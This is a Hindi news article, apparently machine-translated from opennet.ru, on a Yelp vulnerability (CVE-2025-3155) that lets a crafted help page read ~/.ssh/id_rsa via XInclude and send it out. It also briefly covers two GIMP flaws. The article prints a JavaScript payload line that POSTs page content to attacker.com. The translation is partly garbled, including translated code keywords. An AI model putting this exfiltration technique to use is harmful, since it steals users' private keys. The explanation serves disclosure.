GNOME हेल्प के डिफ़ॉल्ट ब्राउज़र Yelp में एक सुरक्षा खामी (CVE-2025-3155) पाई गई है, जो विशेष रूप से तैयार की गई पेज फ़ाइलों को खोलते समय मनमाना जावास्क्रिप्ट कोड निष्पादन की अनुमति देती है। ऐसे स्क्रिप्ट को निष्पादित करने से उपयोगकर्ता की फ़ाइलें हमलावर के सर्वर पर भेजी जा सकती हैं। प्रभावित वितरणों के लिए पैच की प्रगति को आप निम्नलिखित पृष्ठों पर देख सकते हैं: Debian, UbuntuRHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.
गनोम में, सहायता फ़ाइलें खोलने के लिए "ghelp://" URI पंजीकृत किया जाता है, जिसका समाधान येल्प कॉल के माध्यम से किया जाता है। हमला करने के लिए, हमलावर को उपयोगकर्ता के सिस्टम पर अपनी index.page फ़ाइल लोड करनी होगी। उदाहरण के लिए, आप हमलावर की साइट पर दिए गए लिंक पर क्लिक करके किसी को ब्राउज़र के माध्यम से फ़ाइल डाउनलोड करने के लिए प्रेरित कर सकते हैं। एक बार फ़ाइल डाउनलोड हो जाने पर, हमलावर ब्राउज़र को अपने पृष्ठ से URL ghelp://» पर रीडायरेक्ट करके इस दस्तावेज़ को खोलने की शुरुआत कर सकता है, जिसमें उस निर्देशिका का पथ होता है जहां फ़ाइल डाउनलोड की गई थी। उदाहरण के लिए, "ghelp:///proc/self/cwd/Downloads", जहां पथ "/proc/self/cwd" वर्तमान प्रक्रिया की कार्यशील निर्देशिका से संबद्ध है (yelp चलाते समय, यह उपयोगकर्ता की होम निर्देशिका होगी)।
यह खामी पेज फाइलों में XML-आधारित Mallard फॉर्मेट के इस्तेमाल के कारण होती है। यह फॉर्मेट XInclude मैकेनिज्म का उपयोग करके अन्य फाइलों की सामग्री को डॉक्यूमेंट में डालने की अनुमति देता है। पेज फाइलों को रेंडर करने के लिए, Yelp उन्हें XSLT (yelp-xsl) का उपयोग करके XML से HTML में परिवर्तित करता है, और फिर उन्हें WebKitGtk इंजन का उपयोग करके प्रदर्शित करता है। इसका उद्देश्य परिणामी HTML फाइल में जावास्क्रिप्ट को इंजेक्ट करना और इस जावास्क्रिप्ट का उपयोग करके इसे भेजना है। सर्वर XInclude के माध्यम से सामग्री प्रतिस्थापित की गई।
जावास्क्रिप्ट प्रतिस्थापन XSLT का उपयोग करके कुछ तत्वों को बिना पार्स किए HTML में कॉपी करने के द्वारा किया जाता है, उदाहरण के लिए, पूरे तत्व को स्थानांतरित करके। और सभी अंतर्निहित सामग्री। इस प्रकार, बाहरी प्रसारण के लिए। सेवक "~/.ssh/id_rsa" फ़ाइल बनाने के लिए, बस "include" निर्देश का उपयोग करके इसे पेज दस्तावेज़ में डालें:
फिर तत्व के माध्यम से जोड़ें Fetch() फ़ंक्शन का उपयोग करके बाहरी सर्वर पर POST अनुरोध भेजने के लिए कोड के साथ जावास्क्रिप्ट कॉल: onload=_=>fetch("http://attacker.com/",{विधि:"POST",body:document.body.outerHTML,मोड:"no-cors"})
इसके अतिरिक्त, GIMP ग्राफिक्स एडिटर में दो कमजोरियां (CVE-2025-2761, CVE-2025-2760) देखी जा सकती हैं, जिसके कारण उपयोगकर्ता द्वारा XWD और FLI प्रारूपों में विशेष रूप से तैयार की गई छवियों को खोलने पर हमलावर कोड का निष्पादन हो जाता है। दोनों कमजोरियां फ़ाइल सामग्री की पार्सिंग के दौरान बफर में कॉपी किए गए डेटा के आकार की उचित जांच न किए जाने के कारण होती हैं। GIMP संस्करण 3.0.0 में कमजोरियों को ठीक कर दिया गया है।
स्रोत: opennet.ru
